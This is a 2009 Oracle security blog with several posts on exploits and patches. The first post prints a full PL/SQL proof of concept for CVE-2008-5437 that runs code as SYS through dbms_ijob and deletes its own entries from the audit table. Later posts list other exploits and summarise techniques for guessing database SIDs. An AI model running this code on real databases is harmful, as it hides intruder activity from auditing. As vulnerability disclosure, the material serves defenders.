16 Jan 2009 von Alexander Kornbrust.

Here is the proof of concept code for the issue in dbms_ijob [CVE-2008-5437] from Volker Solinus, a really smart DBA, my former colleague from Oracle Consulting Germany.

A different bug concerning Auditing reported by us is still open. Oracle Auditing alone is not sufficient because there are various ways to bypass it. . Often it is better to use a 3rd-party solution like Hedgehog from Sentrigo.

– Bypassing Oracle Auditing
– Everything executed via dbms_ijob (granted to DBAs by default)
– will not appear in the Oracle auditing
– by Volker Solinus

declare
jj    integer := 666666;    — job number
begin
sys.dbms_ijob.submit(
JOB =>        jj,
LUSER =>    ‘SYS’,
PUSER =>    ‘SYS’,
CUSER =>    ‘SYS’,
NEXT_DATE =>    sysdate,
INTERVAL =>    null,
BROKEN =>    false,
WHAT =>        ‘
declare
jj    integer := ‘||jj||’;
begin
execute immediate ”alter system archive log current”;
sys.dbms_ijob.remove(jj);
delete from sys.aud$ where obj$name = ”DBMS_IJOB”;
commit;
end;’,
NLSENV =>     ‘NLS_LANGUAGE=”AMERICAN” NLS_TERRITORY=”AMERICA” NLS_CURRENCY=”$” NLS_ISO_CURRENCY=”AMERICA” NLS_NUMERIC_CHARACTERS=”.,” NLS_DATE_FORMAT=”DD-MON-RR” NLS_DATE_LANGUAGE=”AMERICAN” NLS_SORT=”BINARY”’,
ENV =>        hextoraw(’0102000200000000′));
sys.dbms_ijob.run(jj);
exception when others then
if sqlcode=-12011 then
sys.dbms_ijob.remove(jj);
end if;
raise;
end;
/
After applying the January CPU 2009 you will get the following error message:

ERROR at line 1:
ORA-12718: operation requires connection as SYS
ORA-06512: at line 32

Geschrieben in Exploit, Oracle Security | Drucken | Keine Kommentare »

15 Jan 2009 von Alexander Kornbrust.

Joxean Koret has published the first exploit for remote code execution on Oracle Secure Backup 10g. Having the name “Secure” in the title is probably not always the smartest idea…

And an additional exploit for Oracle TimesTen from Joxean too.

Geschrieben in Exploit | Drucken | Keine Kommentare »

15 Jan 2009 von Alexander Kornbrust.

In the first week of January Alexandr Polyakov from dsec.ru has published 3 exploits on the website of dsec.ru.

• SYS.LT.COMPRESSWORKSPACE
• SYS.LT.MERGEWORKSPACE
• SYS.LT.REMOVEWORKSPACE 

Alexandr has published also a really good whitepaper how to guess the SID of Oracle databases. Some of the bugs (database control/database vault control) and techniques (like the concept sidguessing) were found / developed first by Red-Database-Security.

The whitepaper describes

• Getting the SID and Servicename
• Guessing the SID (default SID, typical SID, dictionary, Bruteforce)
• Searching the SID (Database Control, XDB,…)
• Getting the SAP SID
• Getting the SID via SQL Injection
• Getting the SID via the target system (Registry, FTP, MSSQL, OS account)
• Getting the SID from the company network (Sniffing, another DB, …)

Geschrieben in Exploit | Drucken | Keine Kommentare »

13 Jan 2009 von Alexander Kornbrust.

Oracle just released the January 2009 CPU.

The database part of this CPU contains fixes for 10 vulnerabilities in the Oracle database. This time Oracle fixed 3 of our vulnerabilities (2 in the database) and 1 in JDeveloper (reported 2005, CVE-2008-2623).

15 researchers are mentioned in this report (2 from Red-Database Security (Franz Hüll and I). The usual suspect (Esteban, Joxean and David) are part of the reporters too.

The most critical bug (CVE-2008-5437) allows any user with execute privileges on dbms_ijob (e.g. DBA or hacker/user with DBA privs) to bypass Oracle Auditing completely. This means no traces in the AUD$ and/or the operating system! All databases are affected.

Before I will release details for this issue I must check the patches from Oracle what bug Oracle has fixed. I reported 2 different bugs to Oracle where you can bypass Auditing. The exploit and idea for one of the bugs came from my former Oracle colleague Volker Solinus.

The second bug from us  is a SQL injection bug in  DBMS_STREAMS_AUTH (CVE-2008-4015). Here it is possible to become DBA.

More details within the next days.

Geschrieben in Oracle Security | Drucken | Keine Kommentare »